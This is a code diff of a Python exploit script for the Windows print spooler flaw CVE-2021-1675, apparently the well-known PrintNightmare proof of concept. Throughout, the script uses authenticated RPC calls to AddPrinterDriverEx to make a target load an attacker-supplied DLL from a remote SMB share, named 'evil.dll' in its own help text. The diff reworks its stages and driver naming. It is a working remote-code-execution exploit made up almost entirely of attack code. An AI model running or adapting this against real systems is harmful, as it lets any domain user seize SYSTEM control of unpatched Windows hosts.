@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL):
return blob
def main ( dce , pDriverPath , share , handle = NULL ) :
def main ( dce , pDriverPath , driverName , share , handle = NULL ) :
#build DRIVER_CONTAINER package
container_info = rprn . DRIVER_CONTAINER ( )
container_info [ ' Level ' ] = 2
container_info [ ' DriverInfo ' ] [ ' tag ' ] = 2
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' cVersion ' ] = 3
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pName ' ] = " 1234 \x00 "
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pName ' ] = " {0} 0 \x00 " . format ( driverName )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pEnvironment ' ] = " Windows x64 \x00 "
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDriverPath ' ] = pDriverPath + ' \x00 '
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDataFile ' ] = " {0} \x00 " . format ( share )
@ -84,18 +84,15 @@ def main(dce, pDriverPath, share, handle=NULL):
resp = rprn . hRpcAddPrinterDriverEx ( dce , pName = handle , pDriverContainer = container_info , dwFileCopyFlags = flags )
print ( " [*] Stage0: {0} " . format ( resp [ ' ErrorCode ' ] ) )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ kernelbase.dll \x00 "
for i in range ( 1 , 30 ) :
try :
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ spool \\ drivers \\ x64 \\ 3 \\ old \\ {0} \\ {1} \x00 " . format ( i , filename )
resp = rprn . hRpcAddPrinterDriverEx ( dce , pName = handle , pDriverContainer = container_info , dwFileCopyFlags = flags )
print ( " [*] Stage {0} : {1} " . format ( i , resp [ ' ErrorCode ' ] ) )
if ( resp [ ' ErrorCode ' ] == 0 ) :
print ( " [+] Exploit Completed " )
sys . exit ( )
except Exception as e :
#print(e)
pass
# Just ask for a new driver with already installed files
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pName ' ] = " {0} 1 \x00 " . format ( driverName )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ spool \\ drivers \\ x64 \\ 3 \\ {0} \x00 " . format ( filename )
flags = rprn . APD_COPY_NEW_FILES | 0x10 | 0x8000
resp = rprn . hRpcAddPrinterDriverEx ( dce , pName = handle , pDriverContainer = container_info , dwFileCopyFlags = flags )
print ( " [*] Stage1: {0} " . format ( resp [ ' ErrorCode ' ] ) )
if ( resp [ ' ErrorCode ' ] == 0 ) :
print ( " [+] Exploit Completed " )
if __name__ == ' __main__ ' :
@ -105,6 +102,7 @@ Example;
. / CVE - 2021 - 1675. py hackit . local / domain_user : Pass123 @ 192.168 .1 .10 ' \\ \\ 192.168.1.215 \\ smb \\ addCube.dll ' ' C: \\ Windows \\ System32 \\ DriverStore \\ FileRepository \\ ntprint.inf_amd64_83aa9aebf5dffc96 \\ Amd64 \\ UNIDRV.DLL '
""" )
parser . add_argument ( ' target ' , action = ' store ' , help = ' [[domain/]username[:password]@]<targetName or address> ' )
parser . add_argument ( ' driverName ' , action = ' store ' , help = ' name of driver [need to be unique on target] ' )
parser . add_argument ( ' share ' , action = ' store ' , help = ' Path to DLL. Example \' \\ \\ 10.10.10.10 \\ share \\ evil.dll \' ' )
parser . add_argument ( ' pDriverPath ' , action = ' store ' , help = ' Driver path. Example \' C: \\ Windows \\ System32 \\ DriverStore \\ FileRepository \\ ntprint.inf_amd64_83aa9aebf5dffc96 \\ Amd64 \\ UNIDRV.DLL \' ' , nargs = " ? " )
group = parser . add_argument_group ( ' authentication ' )
@ -170,11 +168,4 @@ Example;
print ( " [+] pDriverPath Found {0} " . format ( pDriverPath ) )
print ( " [*] Executing {0} " . format ( options . share ) )
#re-run if stage0/stageX fails
print ( " [*] Try 1... " )
main ( dce , pDriverPath , options . share )
print ( " [*] Try 2... " )
main ( dce , pDriverPath , options . share )
print ( " [*] Try 3... " )
main ( dce , pDriverPath , options . share )
main ( dce , pDriverPath , options . driverName , options . share )